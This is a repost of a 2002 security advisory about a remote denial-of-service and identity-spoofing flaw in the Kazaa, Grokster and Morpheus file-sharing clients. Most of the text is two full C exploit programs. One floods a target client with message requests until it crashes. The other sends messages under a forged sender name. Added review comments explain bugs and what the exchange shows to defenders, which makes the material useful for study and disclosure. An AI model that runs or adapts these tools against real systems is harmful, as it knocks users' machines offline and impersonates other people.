
Here is some interesting reading taken from:

www.securiteam.com

Quote:

Title 27/2/2002
Kazaa, Grokster and Morpheus Remote Denial of Service


Summary
Kazaa, Grokster, and Morpheus suffer from a remote denial of service vulnerability. The same vulnerability also allows identity hijacking, letting an attacker send a message to the target under someone else's name.


Details
Vulnerable systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.3.3

Immune systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.5

There is a remote denial of service in the FastTrack peer-to-peer technology used by Kazaa, Grokster, and Morpheus that can allow an attacker to crash the program and, in certain cases, hang the machine.

In the same service, a malicious attacker can fake an identity in order to involve the remote user in operations of the attacker's choosing.

Solution:
The vendor has released a new version that is not affected by the vulnerability described above.

Exploit code (DoS):
/* kazaa-xploit.c code
*
* Filename : kazaa-xploit.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send X messages to any kazaa, grokster and morpheus client
* version 1.3.3 for windows exhausting the system.
*
* Compile: #gcc -o kazaa-xploit kazaa-exploit.c
* Usage: #./kazaa-xploit host/ip nmessages
* Example: #./kazaa-xploit 192.168.0.5 1000
*
* This will send 1000 messages to given kazaa client.
* Proof of concept for the same advisory. Source code
* extracted from kazaa-msg.c program written by mrjade, for
* sending readable messages to any kazaa user.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* NOTES:
* Improves of this code can generate diferent id@domain names for
* each connection.
*
* For 300mb of RAM 1000 messages will be a good example.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user" /* Default id for sending msg */
#define minetwork "domain.com" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Procedure section ==--- */

/* Usage Banner..*/
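/* Print the usage banner to stdout and terminate with status -1.
 * pname: program name shown in the usage line (normally argv[0]). */
void usage(char *pname) {
    printf (" :: Usage : %s ip/host n_messages\n", pname);
    /* This line has no conversion specifier, so it takes no argument
     * (the original passed pname here as a stray extra parameter). */
    printf (" :: 1000 for 300mb of RAM aprox.\n");
    fflush (stdout);
    exit(-1);
}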

/* Resolv hostname */

/* Resolve a dotted-quad literal or a host name to a network-order IPv4
 * address.  Returns 0 when the name lookup fails (callers treat 0 as
 * "host not found").  A literal that inet_addr() rejects is handed to
 * gethostbyname(), which also catches the INADDR_NONE ambiguity for
 * "255.255.255.255". */
unsigned long resol(char *host) {
    struct in_addr target;
    struct hostent *entry;

    target.s_addr = inet_addr(host);
    if (target.s_addr != (in_addr_t)-1) {
        return target.s_addr;           /* already a numeric address */
    }

    printf(" :: Resolving host: %s\n", host);
    entry = gethostbyname(host);
    if (entry == NULL) {
        return 0;
    }
    memcpy(&target.s_addr, entry->h_addr_list[0], entry->h_length);
    return target.s_addr;
}


/* Return the value that follows `token` in `buffer`, terminated in place.
 *
 * buffer: NUL-terminated text to search; it is modified (one byte zeroed).
 * token:  prefix to look for, e.g. "Username: ".
 *
 * Returns a pointer into `buffer` just past `token`, or NULL if `token`
 * does not occur.
 *
 * NOTE(review): the strchr() result is dereferenced without a NULL check,
 * so a buffer with no LF after the token crashes here.  The terminator is
 * written at strf[-1], the byte before the LF -- presumably to drop a
 * preceding CR; when the line ends in a bare LF this removes the last
 * character of the value instead.
 */
char *get_token (char *buffer, char *token){
    char *stri, *strf;

    if ((stri = strstr (buffer, token))){
        stri = stri + strlen(token);      /* skip the header name */
        strf = strchr (stri, 0xA);        /* end of this header line */
        strf[-1]= 0;
    } else {
        return (NULL);
    }
    return (stri);
}

/* ---== MAIN Procedure ==--- */

/* Entry point of kazaa-xploit.c.
 *
 * argv[1]      host name or dotted-quad address of the peer
 * argv[argc-1] number of ".message" requests to send (< 1 -> 1000)
 *
 * Flow: resolve the host, open one TCP connection to PORT, send
 * http_basic and pull the "Username: " and "Network: " header values out
 * of the reply, then open a new connection per iteration and send one
 * kazaa_head request addressed to that user with the fixed id_@minetwork
 * as the claimed sender.  Returns 0 after `cont` deliveries; every error
 * path calls exit(-1).
 *
 * Defender's view of what this exchange shows: the sender identity is
 * carried only in request headers (kazaa_head) and nothing here
 * authenticates it, and each message is a fresh short-lived TCP
 * connection, so the receiving side sees no per-sender state to limit.
 */
int main(int argc, char *argv[]) {
    int sock, c_, cont;
    char *host;
    struct sockaddr_in TheHoSt;        /* never zeroed: sin_zero stays uninitialised */
    char *btmp;                        /* formatted kazaa_head request */
    char *user_name, *id; /* user_name = id = remote user name */
    char *user_net, *network; /* user_net = network = remote user network */
    char buffer[512]; /* Rec. buffer*/
    int a=0;

    printf("\n :: xploit code for kazaa, morpheus and grokster users..");
    printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");

    /* Both the host and the message count are mandatory. */
    if( argc < 3) {
        usage( argv[0] );
    }

    /* Host resolv and connect */
    host = argv[1];
    TheHoSt.sin_family = AF_INET;
    TheHoSt.sin_addr.s_addr = resol(host);   /* 0 means resolution failed */
    if(!TheHoSt.sin_addr.s_addr) {
        printf(" :: ERROR: host not found.\n\n");
        exit(-1);
    }

    /* We must get remote user name, need it to send any request */
    TheHoSt.sin_port = htons(PORT);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) {
        printf(" :: ERROR: Can't open socket\n\n");
        exit(-1);
    }
    bzero(buffer,sizeof(buffer));
    if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

        printf(" ::\n :: Getting username@network: "); fflush(stdout);

        /* Search for username@userdomiain on host */
        /* NOTE(review): send()/recv() results are not checked.  recv() may
         * fill all 512 bytes, in which case buffer has no NUL terminator
         * and get_token()'s strstr() can read past its end. */
        send(sock,http_basic,strlen(http_basic),0);
        recv(sock,buffer,sizeof(buffer),0);
        close(sock);

        /* get_token() terminates each value in place inside buffer. */
        if ((user_net = get_token(buffer, "Network: ")) && \
            (user_name = get_token(buffer, "Username: "))){
            printf ("%s@%s\n", user_name, user_net);
            fflush (stdout);
        } else {
            printf ("ERR\n :: No username or network detected\n\n");
            fflush (stdout);
            exit (-1);
        }

        /* Storing strings */
        /* NOTE(review): malloc() results are not checked.  `network` is
         * copied here but never read again in this function (the request
         * below uses the minetwork constant instead). */
        network = malloc (strlen(user_net)+1);
        bzero (network, strlen(user_net)+1);
        memcpy (network, user_net, strlen(user_net));

        id = malloc (strlen(user_name)+1);
        bzero (id, strlen(user_name)+1);
        memcpy (id, user_name, strlen(user_name));
    } else {
        printf(" :: ERR Can't connect.\n\n");
        fflush(stdout);
        exit (-1);
    }

    /* number of msg to send*/
    /* Unparseable or non-positive input silently becomes 1000. */
    cont = strtol (argv[argc-1],0,10);
    if (cont < 1){
        cont= 1000;
    }
    printf(" :: Sending %d messages:\n", cont);
    fflush(stdout);


    /* create HTTP request */
    /* Sized from the format string plus the three substituted values; the
     * same request bytes are reused for every iteration below. */
    c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+ 3;
    btmp = malloc( c_);
    bzero(btmp, c_);
    sprintf (btmp, kazaa_head, id_, minetwork, id);



    /* Loop: one TCP connection per message; stops at the first failure. */
    for (a=0; a < cont; a++){

        /* Now send the message request */
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
            printf(" :: ERROR: Can't open socket\n\n");
            exit(-1);
        }

        printf(".");fflush(stdout);
        bzero(buffer,sizeof(buffer));
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
            send(sock,btmp,strlen(btmp),0);
            recv(sock,buffer,sizeof(buffer),0);
            /* Success test is a substring search for "200" anywhere in the
             * first 512 reply bytes, not a parse of the status line. */
            if (strstr(buffer, "200")){ // HTTP OK
                printf(".");fflush(stdout);
            } else {
                printf("\n :: Can't deliver message. \n\n");fflush(stdout);
                close(sock);
                exit(-1);
            }
            bzero(buffer,sizeof(buffer)); //Clear Buffer
        } else {
            close(sock);
            printf("\n :: Can't connect. Service down \n\n");
            exit(-1);
        }
        close (sock);
    } /* for */
    return (0);
}


Exploit code (Message spoofing):
/* kazaa-msg.c code
*
* Filename : kazaa-msg.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send a message to any kazaa, grokster and morpheus user,
* knowing their ip/hostname. Programmed for hackindex team.
* http://www.hackindex.com
*
* Compile: #gcc -o kazaa-msg kazaa-msg.c
*
* Usage: #./kazaa-msg host/ip message
*
* Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
*
* This will send a message to given kazaa user (host). Actually this is
* just a proof of concept. Required fields to send a message are:
*
* X-Kazaa-Username
* X-Kazaa-Network
*
* These will form the "FROM" : name@network
* modify the id_ and minetwork defines to change "FROM" field.
*
* X-Kazaa-IMTo "TO" field. Remote kazaa's login
* (kazaa, grokster, morpheus)
* It's retrieved from a first connection to
* host.
* X-Kazaa-IMType user_text Type of data (fixed)
* X-Kazaa-IMData Message radix64 encoded.
*
* For grokster (tested) and morpheus (not tested) the name of the fields
* in the HTTP header are the same.
*
* If you want to receive any answer from the remote user, you must open
* a tcp socket listening on port 1214. HTTP header will be the same, and
* message must be decoded using Radix64 algorithm.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* Other Copyright:
*
* radix64 encode table and enc64() by Carl M. Ellison *
*
* NOTES:
* Not tested at all; it may be buggy.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin" /* Default id for sending msg */
#define minetwork "hackindex" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Global variables ==--- */


/* radix64 (base64) alphabet: 6-bit value -> ASCII symbol.  The literal is
 * exactly 64 characters, so the array holds no NUL terminator. */
char enctab[64] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789+/";

/* ---== Procedure section ==--- */

/* Usage Banner..*/
/* Usage banner: print how to invoke the program, then exit with -1.
 * pname is the program name shown in the banner (normally argv[0]). */
void usage(char *pname) {
    fprintf(stdout, " :: Usage : %s ip/host mensaje\n", pname);
    fflush(stdout);
    exit(-1);
}

/* Resolv hostname */
/* Turn a host name or dotted-quad literal into a network-order IPv4
 * address.  A literal is accepted directly; anything else goes through
 * gethostbyname().  Returns 0 when the lookup fails. */
unsigned long resol(char *host) {
    struct in_addr parsed;
    struct hostent *looked_up;

    parsed.s_addr = inet_addr(host);
    if (parsed.s_addr == (in_addr_t)-1) {
        /* not a numeric address (or INADDR_NONE itself): ask the resolver */
        printf(" :: Resolving host: %s\n", host);
        looked_up = gethostbyname(host);
        if (looked_up == NULL) {
            return 0;
        }
        memcpy(&parsed.s_addr, looked_up->h_addr_list[0], looked_up->h_length);
    }
    return parsed.s_addr;
}


/* Return the value that follows `token` in `buffer`, terminated in place.
 *
 * buffer: NUL-terminated text to search; it is modified (one byte zeroed).
 * token:  prefix to look for, e.g. "Username: ".
 *
 * Returns a pointer into `buffer` just past `token`, or NULL if `token`
 * does not occur.
 *
 * NOTE(review): the strchr() result is dereferenced without a NULL check,
 * so a buffer with no LF after the token crashes here.  The terminator is
 * written at strf[-1], the byte before the LF -- presumably to drop a
 * preceding CR; when the line ends in a bare LF this removes the last
 * character of the value instead.
 */
char *get_token (char *buffer, char *token){
    char *stri, *strf;

    if ((stri = strstr (buffer, token))){
        stri = stri + strlen(token);      /* skip the header name */
        strf = strchr (stri, 0xA);        /* end of this header line */
        strf[-1]= 0;
    } else {
        return (NULL);
    }
    return (stri);
}


/* Radix-64 (base64) encode `inb_lth` bytes of `inbuff` into `outbuff`.
 * Routine and table are credited to Carl M. Ellison in the file header.
 *
 *   outbuff   destination text buffer
 *   out_lth   capacity of outbuff; the loop stops once out_lth <= 5, and
 *             the routine never writes a NUL terminator
 *   polth     set to the number of bytes written to outbuff
 *   inbuff    binary input
 *   inb_lth   number of input bytes
 *   line_lth  output characters per line before a '\n' is inserted
 *   n_space   spaces written at the start of each continuation line
 *
 * NOTE(review): b[1] and b[2] are read for every 3-byte group, including
 * a final group of only 1 or 2 bytes, so up to 2 bytes past the end of
 * inbuff are read and the low bits of c[1] (1-byte tail) or c[2] (2-byte
 * tail) depend on that out-of-bounds data.
 * NOTE(review): the "-1 means infinite" remark on line_lth does not match
 * the code: nl starts at line_lth, so a negative value makes `nl <= 0`
 * true after the first group and a line break is emitted every 4 output
 * characters.
 */
void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff ; /* output buffer */
long out_lth ; /* allocated length of the output buffer */
long *polth ; /* actual length of output */
unsigned char *inbuff ; /* input (binary) buffer */
long inb_lth ; /* length of inbuff */
long line_lth ; /* maximum line lth (-1 means infinite) */
long n_space ; /* # spaces at start of each text line */
{
    long nl ; /* # chars left in this line */
    char *b, *c ; /* walking pointers */

    nl = line_lth ;
    b = inbuff ;        /* unsigned char * held in a char *; only masked sub-byte fields are used below */
    c = outbuff ;

    while ( (inb_lth > 0)
        &&(out_lth > 5) ) {
        /* encoding: 3 input bytes -> 4 alphabet symbols */
        c[0]=enctab[(b[0]>>2)&0x3f] ;
        c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)] ;
        c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)] ;
        c[3]=enctab[b[2]&0x3f] ;
        out_lth -= 4 ; /* count the code bytes */
        switch (inb_lth) { /* take care of the final bytes */
        case 1: c[2]='=' ; /* only 1, so == */
                /* fallthrough: a 1-byte tail also needs the second '=' */
        case 2: c[3]='=' ; /* 2, so = */
            inb_lth = 0 ; /* either way, we're done */
            c += 4 ; /* but no spaces */
            *(c++) = '\n' ; /* and there's an end of line */
            break ;

        default:
            inb_lth -= 3;
            b += 3 ;
            c += 4 ;
            nl -= 4 ;
            if (nl <= 0) {
                /* line full: break it and indent the next one */
                long i ;
                *(c++) = '\n' ;
                nl = line_lth ;
                for (i=0;i<n_space;i++)
                    *(c++) = ' ' ;
                out_lth -= 1 + n_space ;
            }
            break ;
        } /* switch */
    } /* while */
    *polth = c - outbuff ;
} /* enc64 */

/* ---== MAIN Procedure ==--- */

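/* Entry point of kazaa-msg.c.
 *
 * argv[1]     host name or dotted-quad address of the peer
 * argv[2..]   words of the message; they are joined with single spaces
 *
 * Flow: resolve the host, open one TCP connection to PORT, send
 * http_basic and pull the "Username: " and "Network: " header values out
 * of the reply; then open a second connection, radix-64 encode the
 * message with enc64() and send one kazaa_head request addressed to that
 * user with the fixed id_@minetwork as the claimed sender.  Exits 0 when
 * a reply chunk containing "200" is seen, -1 on every other path.
 *
 * Defender's view of what this exchange shows: the "from" identity is
 * carried only in request headers and nothing here authenticates it.
 *
 * Change in this revision: the request-size expression reads
 * `strlen(minetwork)`; the identifier had been split by a stray space.
 */
int main(int argc, char *argv[]) {
    int sock, c_, cont;
    char *host;
    struct sockaddr_in TheHoSt;        /* never zeroed: sin_zero stays uninitialised */
    char *btmp;                        /* formatted kazaa_head request */
    char *user_name, *id; /* user_name = id = remote user name */
    char *user_net, *network; /* user_net = network = remote user network */
    char *msg, *msgr64; /* Radix 64 stuff: joined words, encoded text */
    long olth; /* Radix 64 stuff: length written by enc64(), not read afterwards */
    char buffer[512]; /* Rec. buffer*/

    printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
    printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");

    /* The host and at least one message word are mandatory. */
    if( argc < 3) {
        usage( argv[0] );
    }

    /* Host resolv and connect */
    host = argv[1];
    TheHoSt.sin_family = AF_INET;
    TheHoSt.sin_addr.s_addr = resol(host);   /* 0 means resolution failed */
    if(!TheHoSt.sin_addr.s_addr) {
        printf(" :: ERROR: host not found.\n\n");
        exit(-1);
    }

    /* We must get remote user name, need it to send any request */
    TheHoSt.sin_port = htons(PORT);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) {
        printf(" :: ERROR: Can't open socket\n\n");
        exit(-1);
    }
    bzero(buffer,sizeof(buffer));
    if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

        printf(" ::\n :: Getting username@network: "); fflush(stdout);

        /* Search for username@userdomiain on host */
        /* NOTE(review): send()/recv() results are not checked, and a reply
         * that fills all 512 bytes leaves buffer without a NUL terminator
         * for get_token()'s strstr(). */
        send(sock,http_basic,strlen(http_basic),0);
        recv(sock,buffer,sizeof(buffer),0);
        close(sock);

        /* get_token() terminates each value in place inside buffer. */
        if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
            printf ("%s@%s\n", user_name, user_net); fflush (stdout);
        } else {
            printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
            exit (-1);
        }

        /* Storing strings */
        /* NOTE(review): malloc() results are not checked; `network` is
         * copied but never read again (the request uses minetwork). */
        network = malloc (strlen(user_net)+1);
        bzero (network, strlen(user_net)+1);
        memcpy (network, user_net, strlen(user_net));

        id = malloc (strlen(user_name)+1);
        bzero (id, strlen(user_name)+1);
        memcpy (id, user_name, strlen(user_name));
    } else {
        printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
        exit (-1);
    }


    /* Now send the message request */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0) {
        printf(" :: ERROR: Can't open socket\n\n");
        exit(-1);
    }
    bzero(buffer,sizeof(buffer));
    if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

        printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);

        /* Get msg length: each word plus one byte for its trailing space */
        cont=2; c_=0;
        while (cont < argc){
            c_ = c_ + strlen(argv[cont++])+1;
        }

        /* Allocate buffer */
        /* NOTE(review): c_ counts the words and their trailing spaces
         * exactly, so the loop below fills all c_ bytes and the NUL that
         * strcat() writes lands one byte past this allocation. */
        msg = malloc (c_);
        bzero (msg, c_);

        /* Store msg in buffer */
        cont=2;
        while (cont < argc){
            strcat(msg,argv[cont]);
            strcat(msg, " ");
            cont++;
        }
        msg[strlen(msg)]=0;   /* no-op: rewrites the NUL strcat() already placed */

        /* Output buffer for radix64 conv */
        /* enc64() writes no NUL terminator; termination relies on this
         * bzero and on the encoded text fitting within 2*c_ bytes. */
        msgr64 = malloc (2*c_);
        bzero (msgr64, 2*c_);

        /* Convert msg to radix 64 */
        /* All c_ bytes of msg are encoded.  line_lth 9999 defers wrapping
         * until roughly that many output characters; enc64() appends '\n'
         * after a padded tail, so the header value can end in a line
         * break followed by the format's own newlines. */
        enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );

        /* Store in buffer */
        /* Sized from the format string plus the four substituted values. */
        c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
        btmp = malloc(c_);
        bzero(btmp, c_);
        sprintf (btmp, kazaa_head, id_, minetwork, id, msgr64);
        send(sock,btmp,strlen(btmp),0);
        /* Read until recv() fails or the peer closes (a 0-byte read leaves
         * buffer[0] == 0 because buffer is re-zeroed after every chunk);
         * "200" anywhere in a chunk counts as delivered. */
        while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
            if (strstr(buffer, "200")){ // HTTP OK
                printf(" :: Message sent.\n\n");
                close(sock);
                exit(0);
            }
            bzero(buffer,sizeof(buffer)); //Clear Buffer
        }

        printf(" :: Can't deliver message\n\n\n\n");
    } else {
        close(sock);
        printf(" :: Can't connect. Service unavailable.\n\n");
        exit(-1);
    }
    close(sock); //Remote host will close it when finished
    return (-1);
}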


Additional information
The information has been provided by mrjade 2k2.
Please note that the reason this code was posted is to help developers like AYB and Indy (Scyth too) who may actually be interested in making something useful, not destructive.

The innovations we seek are often found by studying misuse. These programs and their code are freely available on the internet and are believed to be in the public domain.